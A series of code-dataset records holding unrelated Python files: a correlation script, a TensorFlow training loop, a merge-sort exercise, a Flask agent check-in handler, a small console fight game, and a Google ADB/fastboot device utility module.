\\\n \"output file.\")\n\nparser.add_argument(\"-o\", \"--out_file\", type=ap.FileType(\"w\"), default=sys.stdout, help = \\\n \"The file to be output. If not specified, the standard output will be used.\")\n\n\ndef get_correlation_confidence(series1, series2):\n\n if len(series1) != len(series2): \n raise ValueError(\"Series must have the same length\")\n\n series_length = len(series1)\n\n correlations = []\n n = 0\n for i in range(series_length):\n\n if series1[i] != 0 or series2[i] != 0:\n n += 1\n\n s1_temp = series1[0:i] + series1[i+1:]\n s2_temp = series2[0:i] + series2[i+1:]\n \n if sum(s1_temp) > 0 and sum(s2_temp) > 0:\n spear = spearmanr(s1_temp, s2_temp)\n correlations.append(spearmanr(s1_temp, s2_temp)[0])\n\n if len(correlations) == 0:\n return (0, 1, 0)\n \n mean, sigma = np.mean(correlations), np.std(correlations)\n\n if sigma > 0: \n\n CI = stats.norm.interval(0.95, loc=mean,\n scale=sigma/sqrt(len(correlations)))\n CI_size = CI[1] - CI[0]\n k = kurtosis(correlations)\n else:\n CI_size = 0\n k = 0\n\n return (mean, CI_size, n)\n\n\nargs = parser.parse_args()\n\nwith args.in_file as json_file:\n with args.out_file as out_file:\n parsed_json = json.loads(json_file.read())\n\n terms = sorted(parsed_json[\"series\"].keys())\n names = sorted(parsed_json[\"series\"][terms[0]].keys())\n\n n_terms = len(terms)\n n_names = len(names)\n\n nodes = [ { \\\n \"name\": names[i], \\\n \"index\": i, \\\n \"color_value\": 0, \\\n \"size\": 20 } \\\n for i in range(n_names) ]\n\n\n links = { term: [] for term in parsed_json[\"series\"].keys() }\n\n for term, series in parsed_json[\"series\"].items():\n for i in [ i for i in range(n_names) if names[i] in series ]:\n for j in [ j for j in range(i + 1, n_names) if names[j] in series ]:\n\n correlation_confidence = get_correlation_confidence(\\\n series[names[i]], \\\n series[names[j]])\n\n links[term].append( { \"source\": i, \\\n \"target\": j, \\\n \"value\" : correlation_confidence })\n\n\n if args.pretty:\n out_file.write(json.dumps( { \\\n \"nodes\" : nodes, \\\n \"links\" : links }, \\\n indent = 4, separators = (\",\",\":\")))\n else:\n out_file.write(json.dumps( { \\\n \"nodes\" : nodes, \\\n \"links\" : links } ))\n\n\n","sub_path":"second_stage/correlate.py","file_name":"correlate.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157478754","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nmicropy.data\n~~~~~~~~~~~~~~\n\nThis module is merely to provide an easy method of locating\ndata files used by MicropyCli\n\"\"\"\n\nfrom pathlib import Path\n\nMOD_PATH = Path(__file__).parent\nPATH = MOD_PATH.resolve()\nSCHEMAS = PATH / 'schemas'\n\n__all__ = [\"PATH\", \"SCHEMAS\"]\n","sub_path":"micropy/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"467186807","text":"import numpy\nimport os\nimport sys\nimport time\nimport core.loader as loader\nimport core.helper as helper\n\nsave_path = 'save'\nresult_path = 'result'\n\nif len(sys.argv) > 1:\n config_path = sys.argv[1]\nelse:\n config_path = input('configure file : ')\n\nsave_path = './{}/{}'.format(save_path, os.path.splitext(os.path.basename(config_path))[0])\nresult_path = './{}/{}'.format(result_path, os.path.splitext(os.path.basename(config_path))[0])\nconfig = loader.load(config_path)\nvariable = helper.init_variable(config)\n\nhelper.load_session(variable['saver'], variable['session'], save_path)\n\nwhile True:\n begin_time = time.time()\n\n ep = variable['session'].run(variable['epoch'])\n if (config['max_epoch'] > 0) and (ep > config['max_epoch']):\n break\n print('Epoch: {}'.format(ep))\n\n lr = config['learning_rate']['type'](ep, config['learning_rate']['option'])\n print(' Learning rate: {}'.format(lr))\n\n # Training\n batch_num = helper.get_batch_number(config['data']['train'].size, config['batch_size'])\n progress_bar = helper.get_progress_bar(batch_num, 10)\n for i in range(batch_num):\n batch_input, batch_output = config['data']['train'].next_batch(config['batch_size'])\n batch_size = len(batch_output[0])\n feed = {variable['learning_rate']: lr}\n feed.update(helper.get_train_feed(config, batch_input, batch_output))\n variable['session'].run(variable['optimizer'], feed_dict=feed)\n\n if i in progress_bar:\n feed = helper.get_test_feed(config, batch_input, batch_output)\n loss = variable['session'].run(variable['loss'], feed_dict=feed)\n accuracy = variable['session'].run(variable['accuracy'], feed_dict=feed)\n print(' {}% - Batch accuracy: {}, Batch avg loss: {}'.format(helper.get_progress(progress_bar, i),\n accuracy,\n loss))\n print(' Completed')\n\n # Testing\n batch_num = helper.get_batch_number(config['data']['test'].size, config['batch_size'])\n correct = [0] * len(variable['accuracy'])\n for i in range(batch_num):\n batch_input, batch_output = config['data']['test'].next_batch(config['batch_size'])\n batch_size = len(batch_output[0])\n feed = helper.get_test_feed(config, batch_input, batch_output)\n accuracy = variable['session'].run(variable['accuracy'], feed_dict=feed)\n sub_correct = numpy.round(numpy.multiply(accuracy, batch_size)).astype(numpy.int)\n correct = numpy.sum([correct, sub_correct], axis=0)\n correct = numpy.divide(correct, config['data']['test'].size)\n print(' Test accuracy: {}'.format(correct))\n\n helper.save_session(variable['saver'], variable['session'], save_path)\n print(' Updated save file')\n\n if not os.path.isdir(os.path.dirname(result_path)):\n os.makedirs(os.path.dirname(result_path))\n with open(result_path, 'a') as stream:\n stream.write('Epoch: {}\\n'.format(ep))\n stream.write(' Accuracy: {}\\n'.format(correct))\n print(' Updated result file')\n\n end_time = time.time()\n print(' Elapsed time: {}'.format(end_time - begin_time))\n\nvariable['session'].close()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"389729751","text":"# Python program for implementation of MergeSort \ndef mergeSort(arr):\n # print(arr)\n if len(arr) == 1:\n return arr\n elif len(arr) == 0:\n return\n\n else:\n l = 0\n r = len(arr) - 1\n m = int((l + r)/2)\n sorted_left = mergeSort(arr[l:m+1])\n sorted_right = mergeSort(arr[m+1:])\n\n \n left_i = 0\n right_i = 0\n final_sorted = []\n while left_i <= len(sorted_left) and right_i <= len(sorted_right):\n print(sorted_right,sorted_left)\n if left_i >= len(sorted_left) and right_i < len(sorted_right) :\n for val in sorted_right[right_i:]:\n final_sorted.append(val)\n break\n\n elif right_i >= len(sorted_right) and left_i < len(sorted_left):\n for val in sorted_left[left_i:]:\n final_sorted.append(val)\n break\n\n else: \n if sorted_left[left_i] < sorted_right[right_i]:\n final_sorted.append(sorted_left[left_i])\n left_i += 1\n elif sorted_right[right_i] < sorted_left[left_i]:\n final_sorted.append(sorted_right[right_i])\n right_i += 1\n else:\n final_sorted.append(sorted_right[right_i])\n final_sorted.append(sorted_left[left_i])\n left_i += 1\n right_i += 1\n return final_sorted\n \n# Code to print the list \ndef printList(arr): \n print(arr)\n #write your code here\n \n# driver code to test the above code \nif __name__ == '__main__': \n arr = [12, 11, 13, 5, 6, 7,8,7,4,5,1] \n print (\"Given array is\", end=\"\\n\") \n printList(arr) \n arr = mergeSort(arr) \n print(\"Sorted array is: \", end=\"\\n\") \n printList(arr) \n","sub_path":"Exercise_4.py","file_name":"Exercise_4.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"291516632","text":"from base64 import b64decode\nfrom flask import json, request\nfrom backend.rabbitmq import rabbit_producer\nfrom models.agent_checkin import AgentCheckin\nfrom processing import agent_task_message\nfrom logger import log\n\n\ndef agent_checkin_json(agent_checkin):\n result = dict(\n {\n \"AgentId\": agent_checkin.AgentId,\n \"IV\": agent_checkin.IV,\n \"HMAC\": agent_checkin.HMAC,\n \"Message\": agent_checkin.Message\n })\n return result\n\n\ndef get_agent_checkin(agent_checkin_id='all'):\n if agent_checkin_id == 'all':\n result = []\n agent_messages = AgentCheckin.query.all()\n for agent_message in agent_messages:\n result.append(agent_checkin_json(agent_message))\n else:\n agent_message = AgentCheckin.query.get(agent_checkin_id)\n result = agent_checkin_json(agent_message)\n return result\n\n\ndef add_agent_checkin(agent_name, transport_id=None, source_ip=None, message=None):\n hmac = None\n iv = None\n msg = None\n if message:\n decoded_checkin = b64decode(message)\n checkin_dict = json.loads(decoded_checkin)\n hmac = checkin_dict[\"HMAC\"]\n iv = checkin_dict[\"IV\"]\n msg = checkin_dict[\"Message\"]\n\n if not source_ip:\n source_ip = request.remote_addr\n\n if not transport_id:\n transport_id = 1\n\n checkin = {\n 'AgentName': agent_name,\n 'TransportId': transport_id,\n 'SourceIp': source_ip,\n 'HMAC': hmac,\n 'IV': iv,\n 'Message': msg\n }\n\n log(\"add_agent_task_response\", \"publishing?\")\n rabbit_producer.send_request('NewAgentCheckin', checkin)\n return {\n 'Success': True,\n 'Result': checkin\n }\n\n\ndef process_agent_checkin(agent_name, transport_id=None, source_ip=None, message=None):\n result = add_agent_checkin(agent_name, transport_id, source_ip, message)\n return agent_task_message.get_unsent_agent_task_messages(agent_name)\n","sub_path":"processing/agent_checkin.py","file_name":"agent_checkin.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"52761406","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'cohorts'\nurlpatterns = [\n # ex: /cohorts/\n path('', views.index, name='index'),\n # ex: /cohorts/5/\n path('/', views.detail, name='detail')\n]","sub_path":"nss/nss/cohorts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"554317784","text":"\"\"\"\nmodule models. describe models Enemy and Player :)\n\"\"\"\n\n\nfrom random import randint\nfrom exceptions import EnemyDown\nfrom exceptions import GameOver\nfrom settings import LIVES\n\n\nclass Enemy:\n \"\"\"\n Class Enemy. describe model Enemy:)\n \"\"\"\n\n def __init__(self, level):\n \"\"\"\n init method :)\n \"\"\"\n self.level = level\n self.lives = level\n\n @staticmethod\n def select_attack():\n \"\"\"\n method atack. random :)\n \"\"\"\n return int(randint(1, 3))\n\n def decrease_lives(self):\n \"\"\"\n method decrease_lives. :)\n \"\"\"\n self.lives = self.lives-1\n print(f\"Enemy lives - {self.lives}\")\n if not self.lives:\n raise EnemyDown()\n\n\nclass Player:\n \"\"\"\n Class Player. describe model Player:)\n \"\"\"\n\n def __init__(self, pl_name):\n \"\"\"\n method init :)\n \"\"\"\n self.pl_name = pl_name\n self.lives = LIVES\n self.score = 0\n\n @staticmethod\n def fight(attack, defense):\n \"\"\"\n method fight :)\n \"\"\"\n win = [(1, 2), (2, 3), (3, 1)]\n lose = [(1, 3), (2, 1), (3, 2)]\n draw = [(1, 1), (2, 2), (3, 3)]\n fight_case = (int(attack), int(defense))\n if fight_case in win:\n return 1\n if fight_case in lose:\n return -1\n if fight_case in draw:\n return 0\n return 0\n\n def decrease_lives(self):\n \"\"\"\n method decrease_lives :)\n \"\"\"\n self.lives = self.lives-1\n print(f\"your lives - {self.lives}\")\n if not self.lives:\n print(f\"your score - {self.score}\\n\")\n raise GameOver(self)\n\n @staticmethod\n def attack(enemy_obj):\n \"\"\"\n method atack :)\n \"\"\"\n pl_choise = input(\"Your attack, Make your choise [1-3] : \")\n enemy_attack = Enemy.select_attack()\n if Player.fight(pl_choise, enemy_attack) > 0:\n print(\"You attacked successfully!\")\n enemy_obj.decrease_lives()\n elif Player.fight(pl_choise, enemy_attack) < 0:\n print(\"You missed!\")\n else:\n print(\"It's a draw!\")\n\n def defence(self, enemy_obj):\n \"\"\"\n method defence :)\n \"\"\"\n pl_choise = input(\"You defence, Make your choise [1-3] : \")\n enemy_attack = enemy_obj.select_attack()\n if Player.fight(enemy_attack, pl_choise) > 0:\n print(\"Enemy attacked successfully!\")\n self.decrease_lives()\n elif Player.fight(enemy_attack, pl_choise) < 0:\n print(\"Enemy missed!\")\n else:\n print(\"It's a draw!\")\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"380908859","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utility module for interaction with adb.\"\"\"\nimport json\nimport os\nimport subprocess\nimport time\n\nfrom gazoo_device import config\nfrom gazoo_device import errors\nfrom gazoo_device import gdm_logger\nfrom gazoo_device.utility import host_utils\n\nimport six\n\nADB_RETRY_SLEEP = 10\nFASTBOOT_TIMEOUT = 10.0\nPROPERTY_PATTERN = r\"\\[(.*)\\]: \\[(.*)\\]\\n\"\nSYSENV_PATTERN = r\"(.*)=(.*)\\n\"\nlogger = gdm_logger.get_logger()\n\n\ndef enter_fastboot(adb_serial, adb_path=None):\n \"\"\"Enters fastboot mode by calling 'adb reboot bootloader' for the adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from calling 'adb reboot' or None if call fails with\n non-zero\n return code.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n return _adb_command((\"reboot\", \"bootloader\"), adb_serial, adb_path=adb_path)\n\n\ndef exit_fastboot(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Exits fastboot mode by calling 'fastboot reboot' for the fastboot_serial provided.\n\n Args:\n fastboot_serial (str): Device fastboot serial number.\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot reboot to return\n\n Raises:\n RuntimeError: if fastboot_path is invalid or fastboot executable was not\n found by get_fastboot_path.\n\n Returns:\n str: Output from calling 'fastboot reboot' or None if call fails with\n non-zero\n return code.\n\n Note:\n If fastboot_path is not provided then path returned by get_fastboot_path\n will be used instead. If fastboot returns a non-zero return code then\n None will be returned.\n \"\"\"\n if fastboot_path is None:\n fastboot_path = get_fastboot_path()\n\n if not os.path.exists(fastboot_path):\n raise RuntimeError(\n \"The fastboot_path of {} appears to be invalid.\".format(fastboot_path))\n\n try:\n args = (\"timeout\", str(timeout), fastboot_path, \"-s\", fastboot_serial,\n \"reboot\")\n return subprocess.check_output(\n args, stderr=subprocess.STDOUT).decode(\"utf-8\", \"replace\")\n except subprocess.CalledProcessError:\n return None\n\n\ndef fastboot_unlock_device(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Unlock the device through fastboot.\n\n Args:\n fastboot_serial (str): Device serial number\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot command to return\n\n Returns:\n str: response from fastboot command\n \"\"\"\n return _fastboot_command((\"flashing\", \"unlock\"),\n fastboot_serial=fastboot_serial,\n fastboot_path=fastboot_path,\n timeout=timeout)\n\n\ndef fastboot_lock_device(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Lock the device through fastboot.\n\n Args:\n fastboot_serial (str): Device serial number\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot command to return\n\n Returns:\n str: response from fastboot command\n \"\"\"\n return _fastboot_command((\"flashing\", \"lock\"),\n fastboot_serial=fastboot_serial,\n fastboot_path=fastboot_path,\n timeout=timeout)\n\n\ndef fastboot_wipe_userdata(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Wipe user data on the device through fastboot.\n\n Args:\n fastboot_serial (str): Device serial number\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot command to return\n\n Returns:\n str: response from fastboot command\n \"\"\"\n return _fastboot_command(\n \"-w\",\n fastboot_serial=fastboot_serial,\n fastboot_path=fastboot_path,\n timeout=timeout)\n\n\ndef enter_sideload(adb_serial, adb_path=None, auto_reboot=False):\n \"\"\"Enters sideload mode by calling 'adb reboot sideload' for the adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable.\n auto_reboot (bool): whether to auto reboot after sideload complete.\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from command call.\n \"\"\"\n if auto_reboot:\n command = (\"reboot\", \"sideload-auto-reboot\")\n else:\n command = (\"reboot\", \"sideload\")\n return _adb_command(command, adb_serial=adb_serial, adb_path=adb_path)\n\n\ndef is_sideload_mode(adb_serial, adb_path=None):\n \"\"\"Checks if device is in sideload mode.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb_path executable was not\n found by\n get_adb_path().\n\n Returns:\n bool: True if device is in sideload mode. False otherwise.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n return adb_serial in get_sideload_devices(adb_path=adb_path)\n\n\ndef sideload_package(package_path, adb_serial, adb_path=None):\n \"\"\"Perform \"adb sideload \" command.\n\n Args:\n package_path (str): the path of the package to sideload.\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable.\n\n Returns:\n str: the command output.\n\n Raises:\n RuntimeError: if package_path is invalid.\n \"\"\"\n if not os.path.isfile(package_path):\n raise RuntimeError(\n \"sideload_package failed: {} is not a file.\".format(package_path))\n return _adb_command((\"sideload\", package_path),\n adb_serial=adb_serial,\n adb_path=adb_path)\n\n\ndef get_sideload_devices(adb_path=None):\n \"\"\"Returns a list of adb devices in sideload mode.\n\n Args:\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n list: A list of device serial numbers that are in sideload mode.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n try:\n output = _adb_command(\"devices\", adb_path=adb_path)\n except RuntimeError as err:\n logger.warning(repr(err))\n return []\n device_lines = [x for x in output.splitlines() if \"\\tsideload\" in x]\n return [x.split()[0] for x in device_lines]\n\n\ndef get_adb_devices(adb_path=None):\n \"\"\"Returns a list of available adb devices.\n\n Args:\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n list: A list of device serial numbers returned by 'adb devices'.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n try:\n output = _adb_command(\"devices\", adb_path=adb_path)\n except RuntimeError as err:\n logger.warning(repr(err))\n return []\n device_lines = [x for x in output.splitlines() if \"\\tdevice\" in x]\n return [x.split()[0].split(\":\", 1)[0] for x in device_lines]\n\n\ndef get_adb_path(adb_path=None):\n \"\"\"Returns the correct adb path to use.\n\n Args:\n adb_path (str): path to \"adb\" executable.\n\n Notes: Starts with passed in path, then looks at config, and finally\n system's default adb if available.\n\n Raises:\n RuntimeError: if no valid adb path could be found\n\n Returns:\n str: Path to correct adb executable to use.\n \"\"\"\n if is_valid_path(adb_path):\n return adb_path\n try:\n with open(config.DEFAULT_GDM_CONFIG_FILE) as config_file:\n gdm_config = json.load(config_file)\n adb_path = gdm_config[config.ADB_BIN_PATH_CONFIG]\n except (IOError, KeyError, ValueError):\n pass\n\n if is_valid_path(adb_path):\n return adb_path\n elif adb_path:\n logger.warning(\"adb path {!r} stored in {} does not exist.\"\n .format(adb_path, config.DEFAULT_GDM_CONFIG_FILE))\n\n if host_utils.has_command(\"adb\"):\n return host_utils.get_command_path(\"adb\")\n raise RuntimeError(\"No valid adb path found using 'which adb'\")\n\n\ndef is_valid_path(path):\n return path and os.path.exists(path)\n\n\ndef connect(adb_serial, adb_path=None):\n \"\"\"Connects to device via ADB.\"\"\"\n resp = _adb_command([\"connect\", adb_serial], adb_path=None)\n if \"unable to connect\" in str(resp):\n raise errors.DeviceError(\n f\"Unable to connect to device {adb_serial!r} via ADB: {resp}\")\n\n\ndef shell(adb_serial, command, adb_path=None, timeout=None, retries=1):\n \"\"\"Issues a command to the shell of the adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number\n command (str): command to send\n adb_path (str): optional alternative path to adb executable\n timeout (int): time in seconds to wait for adb process to complete.\n retries (int): number of times to retry adb command.\n\n Returns:\n str: response from adb command\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n return _adb_command([\"shell\", command], adb_serial,\n adb_path=adb_path, timeout=timeout, retries=retries)\n\n\ndef get_fastboot_devices(fastboot_path=None):\n \"\"\"Returns list of ADB devices in fastboot (bootloader) mode.\n\n Args:\n fastboot_path (str): optional alternative path to fastboot executable\n\n Returns:\n list: A list of ADB device serial numbers in fastboot mode.\n\n Note:\n If fastboot_path is not provided then path returned by get_fastboot_path\n will be used instead.\n If fastboot path invalid, will return empty list.\n \"\"\"\n try:\n fastboot_path = get_fastboot_path(fastboot_path)\n except RuntimeError as err:\n logger.warning(repr(err))\n return []\n\n try:\n output = subprocess.check_output((fastboot_path, \"devices\"),\n stderr=subprocess.STDOUT)\n output = output.decode(\"utf-8\", \"replace\")\n device_lines = [x for x in output.splitlines() if \"astboot\" in x]\n return [x.split()[0] for x in device_lines]\n except subprocess.CalledProcessError:\n return []\n\n\ndef get_fastboot_path(fastboot_path=None):\n \"\"\"Returns the fastboot executable path to use.\n\n Args:\n fastboot_path (str): path to \"fastboot\" executable.\n\n Raises:\n RuntimeError: if no valid fastboot executable could be found\n\n Returns:\n str: Path to correct fastboot executable to use.\n \"\"\"\n if is_valid_path(fastboot_path):\n return fastboot_path\n if host_utils.has_command(\"fastboot\"):\n return host_utils.get_command_path(\"fastboot\")\n raise RuntimeError(\"No valid fastboot path found using 'which fastboot'\")\n\n\ndef is_adb_mode(adb_serial, adb_path=None):\n \"\"\"Checks if device is in adb mode.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n bool: True if device is in adb mode. False otherwise.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n return adb_serial in get_adb_devices(adb_path=adb_path)\n\n\ndef is_device_online(adb_serial, adb_path=None, fastboot_path=None):\n \"\"\"Returns true if the device appears in either 'adb devices' or 'fastboot devices'.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n fastboot_path (str): optional alternative path to fastboot executable\n\n Returns:\n bool: True if device is in adb or fastboot mode. False otherwise.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If fastboot_path is not provided then path returned by\n get_fastboot_path will be used instead.\n \"\"\"\n return (is_adb_mode(adb_serial, adb_path=adb_path) or\n is_fastboot_mode(adb_serial, fastboot_path=fastboot_path))\n\n\ndef is_fastboot_mode(adb_serial, fastboot_path=None):\n \"\"\"Checks if device is in fastboot mode.\n\n Args:\n adb_serial (str): Device serial number.\n fastboot_path (str): optional alternative path to fastboot executable\n\n Raises:\n RuntimeError: if fastboot_path is invalid or fastboot executable was\n not found by get_fastboot_path.\n\n Returns:\n bool: True if device is in fastboot mode. False otherwise.\n\n Note:\n If fastboot_path is not provided then path returned by get_fastboot_path\n will be used instead.\n \"\"\"\n return adb_serial in get_fastboot_devices(fastboot_path=fastboot_path)\n\n\ndef pull_from_device(adb_serial, sources, destination_path=\"./\", adb_path=None):\n \"\"\"Pulls sources from device to destination_path on host for adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n sources (str or list): Path to one or more source files on device to\n copy to host.\n destination_path (str): Path to destination on host computer where file\n should copied to.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path or push failed.\n ValueError: if destination_path directory doesn't exist.\n\n Returns:\n str: Output from calling 'adb push' or None if call raises an erroro\n return code.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned. If no destination_path is provided the file will be copied to\n the current working directory on the host computer.\n \"\"\"\n destination_dir = os.path.dirname(destination_path)\n if destination_dir != \".\" and not os.path.exists(destination_dir):\n raise ValueError(\n \"The destination_path directory {} appears to be invalid.\".format(\n destination_dir))\n\n args = [\"pull\"]\n if isinstance(sources, list):\n for source_path in sources:\n args.append(source_path)\n else:\n args.append(sources)\n args.append(destination_path)\n output, returncode = _adb_command(\n args, adb_serial, adb_path=adb_path, include_return_code=True)\n if returncode != 0:\n raise RuntimeError(\"Pulling file(s) {} on ADB device {} to {} failed. \"\n \"Error: {!r}\".format(sources, adb_serial,\n destination_path, output))\n return output\n\n\ndef push_to_device(adb_serial, sources, destination_path, adb_path=None):\n \"\"\"Pushes sources to destination_path on device for adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n sources (str or list): Path to one or more source files on host computer\n to copy to device.\n destination_path (str): Path to destination on device where file should\n copied to.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path or push failed.\n ValueError: if source_path doesn't exist.\n\n Returns:\n str: Output from calling 'adb push' or None if call raises an erroro\n return code.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n args = [\"push\"]\n if isinstance(sources, list):\n for source_path in sources:\n args.append(source_path)\n if not os.path.exists(source_path):\n raise ValueError(\n \"The source file {} appears to be invalid.\".format(source_path))\n else:\n args.append(sources)\n if not os.path.exists(sources):\n raise ValueError(\n \"The source file {} appears to be invalid.\".format(sources))\n\n args.append(destination_path)\n output, returncode = _adb_command(\n args, adb_serial, adb_path=adb_path, include_return_code=True)\n if returncode != 0:\n raise RuntimeError(\"Pushing file(s) {} to {} on ADB device {} failed. \"\n \"Error: {!r}\".format(sources, destination_path,\n adb_serial, output))\n return output\n\n\ndef reboot_device(adb_serial, adb_path=None, retries=1):\n \"\"\"Calls 'adb reboot' for the adb_serial provided using adb_path.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executables\n retries (int): number of times to retry adb command.\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from calling 'adb reboot'.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n return _adb_command(\"reboot\", adb_serial, adb_path=adb_path, retries=retries)\n\n\ndef root_device(adb_serial, adb_path=None):\n \"\"\"Calls 'adb root' for the adb_serial provided using adb_path.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from calling 'adb root'.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n return _adb_command(\"root\", adb_serial, adb_path=adb_path)\n\n\ndef verify_user_has_fastboot(device_name):\n \"\"\"Verifies fastboot available and user is root or in plugdev group.\n\n Args:\n device_name (str): Device name to use in error output.\n\n Raises:\n DeviceError: Fastboot is not on computer OR\n 'plugdev' group doesn't exist OR\n current user is not in the 'plugdev' group.\n \"\"\"\n if not host_utils.has_command(\"fastboot\"):\n raise errors.DeviceError(\"Device {} verify user has fastboot failed. \"\n \"Fastboot executable is not installed. \"\n \"See readme about installing adb (which installs \"\n \"fastboot) then su -$USER (or logout and back in) \"\n \"to add user to plugdev group\".format(device_name))\n\n\ndef _adb_command(command,\n adb_serial=None,\n adb_path=None,\n include_return_code=False,\n timeout=None,\n retries=1):\n \"\"\"Returns the output of the adb command and optionally the return code.\n\n Args:\n command (str or tuple): ADB command and optionally arguments to execute.\n adb_serial (str): Device serial number\n adb_path (str): optional alternative path to adb executable\n include_return_code (bool): flag indicating return code should also be\n returned.\n timeout (int): time in seconds to wait for adb process to complete.\n retries (int): number of times to retry adb command.\n\n Raises:\n RuntimeError: if adb_path provided or obtained from get_adb_path is\n invalid (executable at path doesn't exist).\n\n Returns:\n str: The ADB command output (including stderr)\n tuple: The ADB command output (including stderr) and return code\n\n Note:\n The stderr is redirected to stdout so callers should use the return code\n or search the output for known errors if they want to determine if the\n command succeeded or not.\n \"\"\"\n adb_path = get_adb_path(adb_path)\n\n if adb_serial is None:\n args = [adb_path]\n else:\n args = [adb_path, \"-s\", adb_serial]\n if isinstance(command, (str, six.text_type)):\n args.append(command)\n elif isinstance(command, (list, tuple)):\n args.extend(command)\n for i in range(0, retries):\n proc = subprocess.Popen(\n args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n try:\n output, _ = proc.communicate(timeout=timeout)\n except subprocess.TimeoutExpired:\n proc.terminate()\n output, _ = proc.communicate()\n output = output.decode(\"utf-8\", \"replace\")\n logger.debug(\"adb command {!r} to {} returned {!r}\".format(\n command, adb_serial, output))\n if include_return_code:\n return output, proc.returncode\n if not any(msg in output for msg in [\"error: closed\", \"offline\"]):\n return output\n if i < retries - 1:\n logger.info(f\"Retrying adb command: {command} in {ADB_RETRY_SLEEP}s\")\n time.sleep(ADB_RETRY_SLEEP)\n 